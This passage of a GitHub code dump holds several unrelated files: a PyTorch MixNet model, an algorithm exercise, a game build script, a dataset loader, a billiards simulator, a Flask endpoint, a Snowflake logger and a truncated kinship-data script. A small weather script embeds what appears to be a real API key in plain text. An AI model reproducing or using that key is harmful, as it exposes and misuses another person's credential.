kernel_sizes):\n super(GPConv, self).__init__()\n self.num_groups = len(kernel_sizes)\n assert in_planes % self.num_groups == 0\n sub_in_dim = in_planes // self.num_groups\n sub_out_dim = out_planes // self.num_groups\n\n self.group_point_wise = nn.ModuleList()\n for _ in kernel_sizes:\n self.group_point_wise.append(nn.Conv2d(sub_in_dim, sub_out_dim,\n kernel_size=1, stride=1, padding=0,\n groups=1, dilation=1, bias=False))\n\n def forward(self, x):\n if self.num_groups == 1:\n return self.group_point_wise[0](x)\n\n chunks = torch.chunk(x, chunks=self.num_groups, dim=1)\n mix = [self.group_point_wise[stream](chunks[stream]) for stream in range(self.num_groups)]\n return torch.cat(mix, dim=1)\n\n\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\n# MDConv: Mixed Depth-wise Convolution for MixDepthBlock\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\nclass MDConv(nn.Module):\n def __init__(self, in_planes, kernel_sizes, stride=1, dilate=1):\n super(MDConv, self).__init__()\n self.num_groups = len(kernel_sizes)\n assert in_planes % self.num_groups == 0\n sub_hidden_dim = in_planes // self.num_groups\n\n assert stride in [1, 2]\n dilate = 1 if stride > 1 else dilate\n\n self.mixed_depth_wise = nn.ModuleList()\n for kernel_size in kernel_sizes:\n padding = ((kernel_size - 1) // 2) * dilate\n self.mixed_depth_wise.append(nn.Conv2d(sub_hidden_dim, sub_hidden_dim,\n kernel_size=kernel_size, stride=stride, padding=padding,\n groups=sub_hidden_dim, dilation=dilate, bias=False))\n\n def forward(self, x):\n if self.num_groups == 1:\n return self.mixed_depth_wise[0](x)\n\n chunks = torch.chunk(x, chunks=self.num_groups, dim=1)\n mix = [self.mixed_depth_wise[stream](chunks[stream]) for stream in range(self.num_groups)]\n return torch.cat(mix, dim=1)\n\n\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\n# MixDepthBlock: MixDepthBlock for MixNet\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\nclass MixDepthBlock(nn.Module):\n def __init__(self, in_planes, out_planes,\n expand_ratio, exp_kernel_sizes, kernel_sizes, poi_kernel_sizes, stride, dilate,\n reduction_ratio=4, dropout_rate=0.2, act_type=\"swish\"):\n super(MixDepthBlock, self).__init__()\n self.dropout_rate = dropout_rate\n self.expand_ratio = expand_ratio\n\n self.groups = len(kernel_sizes)\n self.use_se = (reduction_ratio is not None) and (reduction_ratio > 1)\n self.use_residual = in_planes == out_planes and stride == 1\n\n assert stride in [1, 2]\n dilate = 1 if stride > 1 else dilate\n hidden_dim = in_planes * expand_ratio\n\n # step 1. Expansion phase/Point-wise convolution\n if expand_ratio != 1:\n self.expansion = nn.Sequential(OrderedDict([\n (\"conv\", GPConv(in_planes, hidden_dim, kernel_sizes=exp_kernel_sizes)),\n (\"norm\", nn.BatchNorm2d(hidden_dim, eps=1e-3, momentum=0.01)),\n (\"act\", Swish(inplace=True) if act_type == \"swish\" else nn.ReLU(inplace=True))\n ]))\n\n # step 2. Depth-wise convolution phase\n self.depth_wise = nn.Sequential(OrderedDict([\n (\"conv\", MDConv(hidden_dim, kernel_sizes=kernel_sizes, stride=stride, dilate=dilate)),\n (\"norm\", nn.BatchNorm2d(hidden_dim, eps=1e-3, momentum=0.01)),\n (\"act\", Swish(inplace=True) if act_type == \"swish\" else nn.ReLU(inplace=True))\n ]))\n\n # step 3. Squeeze and Excitation\n if self.use_se:\n reduced_dim = max(1, int(in_planes / reduction_ratio))\n self.se_block = SEBlock(hidden_dim, reduced_dim, act_type=act_type)\n\n # step 4. Point-wise convolution phase\n self.point_wise = nn.Sequential(OrderedDict([\n (\"conv\", GPConv(hidden_dim, out_planes, kernel_sizes=poi_kernel_sizes)),\n (\"norm\", nn.BatchNorm2d(out_planes, eps=1e-3, momentum=0.01))\n ]))\n\n def forward(self, x):\n res = x\n\n # step 1. Expansion phase/Point-wise convolution\n if self.expand_ratio != 1:\n x = self.expansion(x)\n\n # step 2. Depth-wise convolution phase\n x = self.depth_wise(x)\n\n # step 3. Squeeze and Excitation\n if self.use_se:\n x = self.se_block(x)\n\n # step 4. Point-wise convolution phase\n x = self.point_wise(x)\n\n # step 5. Skip connection and drop connect\n if self.use_residual:\n if self.training and (self.dropout_rate is not None):\n x = F.dropout2d(input=x, p=self.dropout_rate,\n training=self.training, inplace=True)\n x = x + res\n\n return x\n\n\nclass MixNet(nn.Module):\n def __init__(self, arch=\"s\", num_classes=1000):\n super(MixNet, self).__init__()\n\n params = {\n 's': (16, [\n # t, c, n, k, ek, pk, s, d, a, se\n [1, 16, 1, [3], [1], [1], 1, 1, \"relu\", None],\n [6, 24, 1, [3], [1, 1], [1, 1], 2, 1, \"relu\", None],\n [3, 24, 1, [3], [1, 1], [1, 1], 1, 1, \"relu\", None],\n [6, 40, 1, [3, 5, 7], [1], [1], 2, 1, \"swish\", 2],\n [6, 40, 3, [3, 5], [1, 1], [1, 1], 1, 1, \"swish\", 2],\n [6, 80, 1, [3, 5, 7], [1], [1, 1], 2, 1, \"swish\", 4],\n [6, 80, 2, [3, 5], [1], [1, 1], 1, 1, \"swish\", 4],\n [6, 120, 1, [3, 5, 7], [1, 1], [1, 1], 1, 1, \"swish\", 2],\n [3, 120, 2, [3, 5, 7, 9], [1, 1], [1, 1], 1, 1, \"swish\", 2],\n [6, 200, 1, [3, 5, 7, 9, 11], [1], [1], 2, 1, \"swish\", 2],\n [6, 200, 2, [3, 5, 7, 9], [1], [1, 1], 1, 1, \"swish\", 2]\n ], 1.0, 1.0, 0.2),\n 'm': (24, [\n # t, c, n, k, ek, pk, s, d, a, se\n [1, 24, 1, [3], [1], [1], 1, 1, \"relu\", None],\n [6, 32, 1, [3, 5, 7], [1, 1], [1, 1], 2, 1, \"relu\", None],\n [3, 32, 1, [3], [1, 1], [1, 1], 1, 1, \"relu\", None],\n [6, 40, 1, [3, 5, 7, 9], [1], [1], 2, 1, \"swish\", 2],\n [6, 40, 3, [3, 5], [1, 1], [1, 1], 1, 1, \"swish\", 2],\n [6, 80, 1, [3, 5, 7], [1], [1], 2, 1, \"swish\", 4],\n [6, 80, 3, [3, 5, 7, 9], [1, 1], [1, 1], 1, 1, \"swish\", 4],\n [6, 120, 1, [3], [1], [1], 1, 1, \"swish\", 2],\n [3, 120, 3, [3, 5, 7, 9], [1, 1], [1, 1], 1, 1, \"swish\", 2],\n [6, 200, 1, [3, 5, 7, 9], [1], [1], 2, 1, \"swish\", 2],\n [6, 200, 3, [3, 5, 7, 9], [1], [1, 1], 1, 1, \"swish\", 2]\n ], 1.0, 1.0, 0.25),\n 'l': (24, [\n # t, c, n, k, ek, pk, s, d, a, se\n [1, 24, 1, [3], [1], [1], 1, 1, \"relu\", None],\n [6, 32, 1, [3, 5, 7], [1, 1], [1, 1], 2, 1, \"relu\", None],\n [3, 32, 1, [3], [1, 1], [1, 1], 1, 1, \"relu\", None],\n [6, 40, 1, [3, 5, 7, 9], [1], [1], 2, 1, \"swish\", 2],\n [6, 40, 3, [3, 5], [1, 1], [1, 1], 1, 1, \"swish\", 2],\n [6, 80, 1, [3, 5, 7], [1], [1], 2, 1, \"swish\", 4],\n [6, 80, 3, [3, 5, 7, 9], [1, 1], [1, 1], 1, 1, \"swish\", 4],\n [6, 120, 1, [3], [1], [1], 1, 1, \"swish\", 2],\n [3, 120, 3, [3, 5, 7, 9], [1, 1], [1, 1], 1, 1, \"swish\", 2],\n [6, 200, 1, [3, 5, 7, 9], [1], [1], 2, 1, \"swish\", 2],\n [6, 200, 3, [3, 5, 7, 9], [1], [1, 1], 1, 1, \"swish\", 2]\n ], 1.3, 1.0, 0.25),\n }\n\n stem_planes, settings, width_multi, depth_multi, self.dropout_rate = params[arch]\n out_channels = self._round_filters(stem_planes, width_multi)\n self.mod1 = ConvBlock(3, out_channels, kernel_size=3, stride=2,\n groups=1, dilate=1, act_type=\"relu\")\n\n in_channels = out_channels\n drop_rate = self.dropout_rate\n mod_id = 0\n for t, c, n, k, ek, pk, s, d, a, se in settings:\n out_channels = self._round_filters(c, width_multi)\n repeats = self._round_repeats(n, depth_multi)\n\n if self.dropout_rate:\n drop_rate = self.dropout_rate * float(mod_id+1) / len(settings)\n\n # Create blocks for module\n blocks = []\n for block_id in range(repeats):\n stride = s if block_id == 0 else 1\n dilate = d if stride == 1 else 1\n\n blocks.append((\"block%d\" % (block_id + 1), MixDepthBlock(in_channels, out_channels,\n expand_ratio=t, exp_kernel_sizes=ek,\n kernel_sizes=k, poi_kernel_sizes=pk,\n stride=stride, dilate=dilate,\n reduction_ratio=se,\n dropout_rate=drop_rate,\n act_type=a)))\n\n in_channels = out_channels\n self.add_module(\"mod%d\" % (mod_id + 2), nn.Sequential(OrderedDict(blocks)))\n mod_id += 1\n\n self.last_channels = 1536\n self.last_feat = ConvBlock(in_channels, self.last_channels,\n kernel_size=1, stride=1,\n groups=1, dilate=1, act_type=\"relu\")\n\n self.classifier = nn.Linear(self.last_channels, num_classes)\n\n self._initialize_weights()\n\n def _initialize_weights(self):\n # weight initialization\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out')\n if m.bias is not None:\n nn.init.zeros_(m.bias)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.ones_(m.weight)\n nn.init.zeros_(m.bias)\n elif isinstance(m, nn.Linear):\n fan_out = m.weight.size(0)\n init_range = 1.0 / math.sqrt(fan_out)\n nn.init.uniform_(m.weight, -init_range, init_range)\n if m.bias is not None:\n nn.init.zeros_(m.bias)\n\n @staticmethod\n def _make_divisible(value, divisor=8):\n new_value = max(divisor, int(value + divisor / 2) // divisor * divisor)\n if new_value < 0.9 * value:\n new_value += divisor\n return new_value\n\n def _round_filters(self, filters, width_multi):\n if width_multi == 1.0:\n return filters\n return int(self._make_divisible(filters * width_multi))\n\n @staticmethod\n def _round_repeats(repeats, depth_multi):\n if depth_multi == 1.0:\n return repeats\n return int(math.ceil(depth_multi * repeats))\n\n def forward(self, x):\n x = self.mod2(self.mod1(x)) # (N, C, H/2, W/2)\n x = self.mod4(self.mod3(x)) # (N, C, H/4, W/4)\n x = self.mod6(self.mod5(x)) # (N, C, H/8, W/8)\n x = self.mod10(self.mod9(self.mod8(self.mod7(x)))) # (N, C, H/16, W/16)\n x = self.mod12(self.mod11(x)) # (N, C, H/32, W/32)\n x = self.last_feat(x)\n\n x = F.adaptive_avg_pool2d(x, (1, 1)).view(-1, self.last_channels)\n if self.training and (self.dropout_rate is not None):\n x = F.dropout(input=x, p=self.dropout_rate,\n training=self.training, inplace=True)\n x = self.classifier(x)\n return x\n\n\nif __name__ == \"__main__\":\n import os\n import time\n from torchstat import stat\n from pytorch_memlab import MemReporter\n\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\n arch = \"l\"\n img_preparam = {\"s\": (224, 0.875), \"m\": (224, 0.875), \"l\": (224, 0.875)}\n net_h = img_preparam[arch][0]\n model = MixNet(arch=arch, num_classes=1000)\n optimizer = torch.optim.SGD(model.parameters(), lr=1e-1,\n momentum=0.90, weight_decay=1.0e-4, nesterov=True)\n \n # stat(model, (3, net_h, net_h))\n\n model = model.cuda().train()\n loss_func = nn.CrossEntropyLoss().cuda()\n dummy_in = torch.randn(2, 3, net_h, net_h).cuda().requires_grad_()\n dummy_target = torch.ones(2).cuda().long().cuda()\n reporter = MemReporter(model)\n \n optimizer.zero_grad()\n dummy_out = model(dummy_in)\n loss = loss_func(dummy_out, dummy_target)\n print('========================================== before backward ===========================================')\n reporter.report()\n \n loss.backward()\n optimizer.step()\n print('========================================== after backward =============================================')\n reporter.report()\n","repo_name":"linksense/MixNet-PyTorch","sub_path":"mixnet.py","file_name":"mixnet.py","file_ext":"py","file_size_in_byte":16947,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"76"} +{"seq_id":"18949524110","text":"T = int(input())\n\nfor tc in range(1, 1+T):\n N = int(input())\n\n nums = []\n red = set()\n blue = set()\n\n # 칠할 영역\n for _ in range(N):\n nums.append(list(map(int, input().split())))\n\n for i in nums:\n # 색상이 빨강이라면\n if i[-1] == 1:\n # 두 점 사이에 있는 좌표를 set 에 저장\n for j in range(i[0], i[2]+1):\n for k in range(i[1], i[3]+1):\n red.add((j, k))\n\n # 파랑일 때\n else:\n for j in range(i[0], i[2]+1):\n for k in range(i[1], i[3]+1):\n blue.add((j, k))\n\n # 빨강과 파랑의 교집합의 수를 출력\n print(f'#{tc} ', end='')\n print(len(red & blue))","repo_name":"LeeHyunJin1997/Algorithm","sub_path":"SWEA/D2/4836.py","file_name":"4836.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72535009525","text":"import time, sys, os, shutil, subprocess, distutils.dir_util\nsys.path.append(\"../../configuration\")\n\nif os.path.isfile(\"log.log\"):\n\tos.remove(\"log.log\")\nlog = open(\"log.log\", \"w\")\nfrom scripts import *\nfrom buildsite import *\nfrom process import *\nfrom tools import *\nfrom directories import *\n\nprintLog(log, \"\")\nprintLog(log, \"-------\")\nprintLog(log, \"--- Build ligo\")\nprintLog(log, \"-------\")\nprintLog(log, time.strftime(\"%Y-%m-%d %H:%MGMT\", time.gmtime(time.time())))\nprintLog(log, \"\")\n\nif LigoExportLand != \"\":\n\tExecTimeout = findTool(log, ToolDirectories, ExecTimeoutTool, ToolSuffix)\n\tLandExport = findTool(log, ToolDirectories, LandExportTool, ToolSuffix)\n\n\tprintLog(log, \">>> Generate ligo zone <<<\")\n\tif LandExport == \"\":\n\t\ttoolLogFail(log, LandExportTool, ToolSuffix)\n\telif ExecTimeout == \"\":\n\t\ttoolLogfail(log, ExecTimeoutTool, ToolSuffix)\n\telse:\n\t\tsubprocess.call([ ExecTimeout, str(LigoExportTimeout), LandExport, ActiveProjectDirectory + \"/generated/land_exporter.cfg\" ])\n\n\tprintLog(log, \">>> Copy to zone builder <<<\")\n\tdirSource = ExportBuildDirectory + \"/\" + LigoZoneBuildDirectory\n\tdirTarget = ExportBuildDirectory + \"/\" + ZoneExportDirectory\n\tmkPath(log, dirSource)\n\tmkPath(log, dirTarget)\n\tcopyFilesExtReplaceNoTreeIfNeeded(log, dirSource, dirTarget, \".zonel\", \".zone\")\n\tcopyFilesExtNoTreeIfNeeded(log, dirSource, dirTarget, \".zonenh\")\n\nlog.close()\n\n\n# end of file\n","repo_name":"ryzom/ryzomcore","sub_path":"nel/tools/build_gamedata/processes/ligo/2_build.py","file_name":"2_build.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":307,"dataset":"github-code","pt":"76"} +{"seq_id":"3436530688","text":"import torch\nfrom torch.utils.data import Dataset\nimport pandas as pd\n\nclass WikiDataset(Dataset):\n def __init__(self,\n ds_csv='train_balanced_10000_samples.csv',\n transform=None):\n \n self.ds_csv = pd.read_csv(ds_csv)\n self.transform = transform\n \n def __len__(self):\n return len(self.ds_csv)\n \n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n # handle slices\n if isinstance(idx, slice):\n claims = self.ds_csv.iloc[idx]['claim']\n sents = self.ds_csv.iloc[idx]['sentence']\n targets = self.ds_csv.iloc[idx]['label']\n pointers = zip(claims, sents, targets)\n \n samples = []\n for (claim, sent, target) in pointers:\n sample = {'data': (claim, sent)}\n if self.transform:\n sample = self.transform(sample)\n sample['target'] = self.encoded_label(target)\n samples.append(sample)\n \n if self.transform:\n return self.transform_collate_fn(samples)\n else:\n return self.collate_fn(samples)\n \n # handle single idx & DataLoader batching\n claim = self.ds_csv.iloc[idx]['claim']\n sent = self.ds_csv.iloc[idx]['sentence']\n target = self.ds_csv.iloc[idx]['label']\n \n target = self.encoded_label(target)\n sample = {'data': (claim, sent), 'target': target}\n if self.transform:\n sample = self.transform(sample)\n \n return sample\n \n @staticmethod\n def encoded_label(label:str):\n return {'SUPPORTS': 1, 'REFUTES': 0}.get(label)\n\n @staticmethod\n def transform_collate_fn(batch):\n collated = {\n 'input_ids': [], \n 'segments': [],\n 'targets': []\n }\n for sample in batch:\n data = sample['data']\n collated['input_ids'].append(data.get('input_ids'))\n collated['segments'].append(data.get('segments'))\n collated['targets'].append(sample.get('target'))\n \n collated_tensors = WikiDataset.dict_values_to_tensor(collated)\n\n return collated_tensors\n \n @staticmethod\n def collate_fn(batch):\n collated = {\n 'data': [],\n 'targets': []\n }\n for sample in batch:\n collated['data'].append(sample['data'])\n collated['targets'].append(sample['target'])\n return collated\n \n @staticmethod\n def dict_values_to_tensor(dict_:dict):\n for k in dict_:\n dict_[k] = torch.tensor(dict_[k]).long()\n return dict_\n\n\nif __name__ == \"__main__\":\n ds = WikiDataset()","repo_name":"jackhhchan/fact-verification-system","sub_path":"src/pytorch_tutorial/fvs/wiki_datasets.py","file_name":"wiki_datasets.py","file_ext":"py","file_size_in_byte":2823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17300042944","text":"\"\"\"\nAbstractTable module for Dynamical Billiards Simulator\nAll the different tables will be a subclass of this abstract superclass\n\"\"\"\n\nimport numpy as np\nfrom matplotlib import animation\nfrom matplotlib import pyplot as plt\nimport matplotlib.patches as patches\n\nfrom PIL import Image\n\nclass Ball(object):\n \"\"\"Holds the colour and state of a ball in the simulation\"\"\"\n def __init__(self, **kwargs):\n super().__init__()\n self.parameters = kwargs\n self.state = self.parameters['initstate']\n self.color = self.parameters['color']\n\nclass AbstractTable(object):\n \"\"\"\n Abstract class for a table that simulates collisions\n this superclass takes care of the animating and preview generation\n subclasses will take care of detecting collisions and drawing the table\n\n subclasses must implement:\n drawTable\n step\n\n all others are optional\n \"\"\"\n\n def __init__(self, **kwargs):\n super().__init__()\n self.parameters = kwargs\n self.ballList = []\n self.nBalls = self.parameters['nBalls']\n self.drag = 0.999 # TODO: possibly change this with entrybox\n\n # use colormap for many colors\n self.cmap = plt.cm.get_cmap(\"gist_rainbow\", self.nBalls + 1)\n\n def drawTable(self, ec='none'):\n \"\"\"\n Each table must implement this function\n should make a figure and axes in self and should draw the table as a\n collection of matplotlib patches\n\n edge colour is for the patches, when animating it can be left as none\n but must be 'k' for generatePreview\n \"\"\"\n return None\n\n def step(self, particle, dt):\n \"\"\"\n each table must implement this function\n for each check particle, check if boundaries crossed and update\n velocity (position is updated in stepall)\n \"\"\"\n return None\n\n def stepall(self, dt):\n \"\"\"\n updates position of each ball and checks boundaries using step\n \"\"\"\n for particle in self.ballList:\n if self.parameters['friction']:\n particle.state[2] *= self.drag\n particle.state[3] *= self.drag\n particle.state[0] += dt * particle.state[2]\n particle.state[1] += dt * particle.state[3]\n\n self.step(particle, dt)\n\n def generatePreview(self):\n \"\"\"\n saves a preview of the figure as preview.png and returns a PIL image\n object of the preview\n\n must run update before using this method\n \"\"\"\n # draw table with black edge color\n self.drawTable('k')\n balls=[]\n # initialize all the balls and their positions\n for i in range(self.nBalls):\n balls.append(Ball(color=self.cmap(i),\n initstate=self.parameters['balls'][i]))\n self.ax.plot(balls[i].state[0], balls[i].state[1],\n color=self.cmap(i), marker = 'o', ms=8)\n # plot arrow indicating velocity vector\n self.ax.add_patch(patches.Arrow(balls[i].state[0], balls[i].state[1], balls[i].state[2]*0.3,\n balls[i].state[3]*0.3, width=0.05, ls='-', color=self.cmap(i)))\n\n # linewidth needs to be larger than animating so it will be visible in\n # the preview\n self.table.set_linewidth(6)\n\n self.fig.savefig('preview.png')\n f=Image.open('preview.png')\n # resize object so it will fit in tkinter canvas\n f=f.resize((300,300))\n return f\n\n def update(self, **kwargs):\n \"\"\"saves new parameters for the Simulation\"\"\"\n self.parameters = kwargs\n\n def main(self,frames=600):\n \"\"\"\n opens the matplotlib window and starts the animation\n should run update before calling with function\n \"\"\"\n # close any figures made from generatePreview\n plt.close('all')\n # make figure and axis and add the table to it\n self.drawTable()\n # define time step. this value seems to work well but can be adjusted\n dt = 1 / 30\n\n # initialize balls and axes objects\n particles = []\n paths = []\n self.pathx = {}\n self.pathy = {}\n\n for i in range(self.nBalls):\n # make ball object and add it to ball list\n self.ballList.append(Ball(color=self.cmap(i), initstate=self.parameters['balls'][i]))\n\n # initialize particles and paths that will be plotted\n\n particles.append(self.ax.plot([], [], color=self.cmap(i), marker='o', ms=6)[0])\n paths.append(self.ax.plot([], [], color=self.cmap(i), ls='-', lw=1)[0])\n self.pathx[i] = np.array([])\n self.pathy[i] = np.array([])\n\n def init():\n \"\"\"\n initialize function for the animation.\n gets run before each frame.\n \"\"\"\n # reset particles\n for ball in particles:\n ball.set_data([], [])\n ball.set_data([], [])\n # reset table\n self.table.set_edgecolor('none')\n return tuple(particles) + (self.table,) + tuple(paths)\n\n def animate(k):\n \"\"\"perform animation step\"\"\"\n # trace the particle if check box is selected\n if self.parameters['trace']:\n for i in range(self.nBalls):\n self.pathx[i] = np.append(self.pathx[i],\n self.ballList[i].state[0])\n self.pathy[i] = np.append(self.pathy[i],\n self.ballList[i].state[1])\n # update position and check for collisions\n self.stepall(dt)\n # update table\n self.table.set_edgecolor('k')\n # set particle position and path data\n for ball in range(self.nBalls):\n particles[ball].set_data(self.ballList[ball].state[0],\n self.ballList[ball].state[1])\n paths[ball].set_data(self.pathx[ball], self.pathy[ball])\n return tuple(particles) + (self.table,) + tuple(paths)\n\n # define animation with appropriate playbackSpeed\n ani = animation.FuncAnimation(self.fig, animate, frames=frames,\n interval=np.ceil((1 / self.parameters['playbackSpeed']) * 10 ** 3),\n blit=True, init_func=init)\n # show matplotlib window\n plt.show()\n return ani\n","repo_name":"henryymliu/Dynamical_Billiards","sub_path":"AbstractTable.py","file_name":"AbstractTable.py","file_ext":"py","file_size_in_byte":6431,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"31368611136","text":"\"\"\"\nAPIで天気を取得(緯度経度から)\n\"\"\"\n\nimport requests\nimport json\n\n\nlat = 35.747 #緯度\nlng = 139.805 #経度\n\nAPI_KEY = \"750d9f39ed5313c3f1a8139bba105580\"\napi = \"http://api.openweathermap.org/data/2.5/weather?units=metric&lat={lat}&lon={lng}&APPID={key}\"\n\nurl = api.format(lat = lat, lng = lng, key = API_KEY)\n\nprint(url)\n\nresponse = requests.get(url)\ndata = response.json()\n\nprint(data[\"main\"][\"temp\"])","repo_name":"tanopanta/benkyooo","sub_path":"api_benkyo/tenkibygeo.py","file_name":"tenkibygeo.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"74211661046","text":"import this\nfrom flask import Flask, jsonify, request\nimport joblib\nimport pandas as pd\nimport numpy as np\nimport os\n\n\ndef configure_routes(app):\n this_dir = os.path.dirname(__file__)\n model_path = os.path.join(this_dir, \"model.pkl\")\n clf = joblib.load(model_path)\n\n @app.route(\"/\")\n def hello():\n return \"try the predict route it is great!\"\n\n @app.route(\"/predict\")\n def predict():\n # use entries from the query string here but could also use json\n age = request.args.get(\"age\")\n absences = request.args.get(\"absences\")\n health = request.args.get(\"health\")\n data = [[age], [health], [absences]]\n query_df = pd.DataFrame(\n {\n \"age\": pd.Series(age),\n \"health\": pd.Series(health),\n \"absences\": pd.Series(absences),\n }\n )\n query = pd.get_dummies(query_df)\n prediction = clf.predict(query)\n return jsonify(np.asscalar(prediction))\n","repo_name":"hankxu1212/313-recitation-7","sub_path":"app/handlers/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"4618713057","text":"import logging\nimport traceback\nimport json\nimport snowflake.connector\nfrom snowflake.connector.pandas_tools import write_pandas\nimport pandas as pd\n\n\nclass Log:\n \"\"\"\n A class to log ETL tasks\n\n ...\n\n Methods\n _______\n\n \"\"\"\n\n def __init__(self, logger_name, data_config, stream=False):\n \"\"\"\n Constructs all the necessary attributes for the Load object.\n\n Parameters\n __________\n logger_name : str\n the name of the logger object\n data_config : dict\n dictionary containing ETL specifications\n stream : bool\n if true, the logger will log to the console, else logs to a file\n \"\"\"\n\n # file path where log will be located\n self.file_path = json.load(open('data_config.json'))['log']['file_path']\n\n # create and configure logger object\n self.logger = logging.getLogger(logger_name)\n self.logger.setLevel(logging.DEBUG)\n\n formatter = logging.Formatter(\n '%(asctime)s.%(msecs)03d | %(threadName)s | %(filename)s | %(lineno)d | %(funcName)s() | %(levelname)s | '\n '%(message)s', '%Y-%m-%d %H:%M:%S')\n\n if stream:\n handler = logging.StreamHandler()\n else:\n handler = logging.FileHandler(self.file_path)\n\n handler.setLevel(logging.DEBUG)\n handler.setFormatter(formatter)\n\n # if the logger does not already have a handler, add the one we created\n if not self.logger.handlers:\n self.logger.addHandler(handler)\n\n # names of columns for log\n self.col_names = data_config['log']['col_names']\n\n # get Snowflake parameters from data_config\n self.USER = data_config['load']['user']\n self.PASSWORD = data_config['load']['password']\n self.ACCOUNT = data_config['load']['account']\n self.WAREHOUSE = data_config['load']['warehouse']\n self.DATABASE = data_config['log']['database']\n self.SCHEMA = data_config['log']['schema']\n self.TABLE_NAME = data_config['log']['table_name']\n\n # datetime columns in log file\n self.datetime_columns = data_config['log']['datetime_columns']\n\n def exception_logging(self, exctype, value, tb):\n \"\"\"\n Method of handling exceptions by logging them, rather than outputing them to the console.\n Pameters\n ________\n exctype :\n value :\n tb :\n\n Returns\n _______\n None\n \"\"\"\n\n # log exception\n exception_string = f'{{exception_type: {exctype}, trcbk: {traceback.format_tb(tb)}, value: {value}}}'\n self.logger.error(exception_string)\n\n # load log into Snowflake\n # self.load_log()\n\n # close log\n self.close_log()\n\n def close_log(self):\n \"\"\"\n Closes the current logger.\n\n Returns\n _______\n None\n \"\"\"\n # remove and close handlers\n handlers = self.logger.handlers[:]\n for handler in handlers:\n self.logger.removeHandler(handler)\n handler.close()\n\n def load_log(self):\n \"\"\"\n Loads the log file into Snowflake.\n Returns\n _______\n None\n \"\"\"\n\n # connect to Snowflake\n conn = snowflake.connector.connect(\n user=self.USER,\n password=self.PASSWORD,\n account=self.ACCOUNT\n )\n\n # get Snowflake cursor\n cur = conn.cursor()\n\n # create warehouse, db, and schema if not exists\n cur.execute(f'CREATE WAREHOUSE IF NOT EXISTS {self.WAREHOUSE}')\n cur.execute(f'CREATE DATABASE IF NOT EXISTS {self.DATABASE}')\n cur.execute(f'USE DATABASE {self.DATABASE}')\n cur.execute(f'CREATE SCHEMA IF NOT EXISTS {self.SCHEMA}')\n\n # specify the warehouse, database, and schema to use when creating the table\n cur.execute(f'USE WAREHOUSE {self.WAREHOUSE}')\n cur.execute(f'USE DATABASE {self.DATABASE}')\n cur.execute(f'USE SCHEMA {self.SCHEMA}')\n\n # read the log file into a pandas dataframe\n file_path = self.file_path\n col_names = self.col_names\n log_df = pd.read_table(file_path, sep='|', header=None, names=col_names)\n\n # append log to the end of the log table\n success, num_chunks, num_rows, _ = write_pandas(conn, log_df, self.TABLE_NAME, self.DATABASE, self.SCHEMA,\n quote_identifiers=False)\n\n # close connector\n conn.close()\n\n def create_log_table(self, load):\n \"\"\"\n Creates a Snowflake table to store log data.\n\n Parameters\n __________\n log : Log object\n Log object from the Log class\n load : Load object\n object for loading data into Snowflake\n\n Returns\n _______\n None\n \"\"\"\n\n # connect to Snowflake\n conn = snowflake.connector.connect(\n user=self.USER,\n password=self.PASSWORD,\n account=self.ACCOUNT\n )\n\n # get cursor\n cur = conn.cursor()\n\n # create warehouse, db, and schema if not exists\n cur.execute(f'CREATE WAREHOUSE IF NOT EXISTS {self.WAREHOUSE}')\n cur.execute(f'CREATE DATABASE IF NOT EXISTS {self.DATABASE}')\n cur.execute(f'USE DATABASE {self.DATABASE}')\n cur.execute(f'CREATE SCHEMA IF NOT EXISTS {self.SCHEMA}')\n\n # specify the warehouse, database, and schema to use when creating the table\n cur.execute(f'USE WAREHOUSE {self.WAREHOUSE}')\n cur.execute(f'USE DATABASE {self.DATABASE}')\n cur.execute(f'USE SCHEMA {self.SCHEMA}')\n\n # read log file into pandas dataframe\n file_path = self.file_path\n col_names = self.col_names\n log_df = pd.read_table(file_path, sep='|', header=None, names=col_names)\n\n # make create string using the load function, and create table\n create = load.get_create_string(self.TABLE_NAME, log_df, self.datetime_columns)\n cur.execute(create)\n\n # close connector\n conn.close()\n\n def get_logger(self):\n \"\"\"returns logger class variable\"\"\"\n return self.logger\n\n\n","repo_name":"unsupervisedpandas/ZoomETLProject","sub_path":"Log.py","file_name":"Log.py","file_ext":"py","file_size_in_byte":6206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23030797492","text":"import random\nimport numpy as np\nimport pandas as pd\nfrom itertools import product\n\nsubject_detail = 'D:/文档/硕士/Thesis/UvA-NEMO_SMILE_DATABASE/Subject_Details.txt'\nfile_detail = 'D:/文档/硕士/Thesis/UvA-NEMO_SMILE_DATABASE/File_Details.txt'\nkin_label = 'D:/文档/硕士/Thesis/UvA-NEMO_SMILE_DATABASE/Kinship_Labels.txt'\n\n# discard_attr = ['granddaughter,grandmother', 'granddaughter,grandfather', 'grandfather,grandson']\n#\n# subsets2attr = {'B-B': [['brother','brother']], 'S-B': [['sister','brother'], ['brother','sister']], 'S-S': [['sister','sister']],\n# 'F-D': [['father','daughter'], ['daughter','father']], 'F-S': [['father','son'], ['son','father']],\n# 'M-S': [['mother','son'], ['son','mother']], 'M-D': [['mother','daughter'], ['daughter','mother']]}\n\nsubsets2attr = {'F-D': [['father','daughter'], ['daughter','father']], 'F-S': [['father','son'], ['son','father']],\n 'M-S': 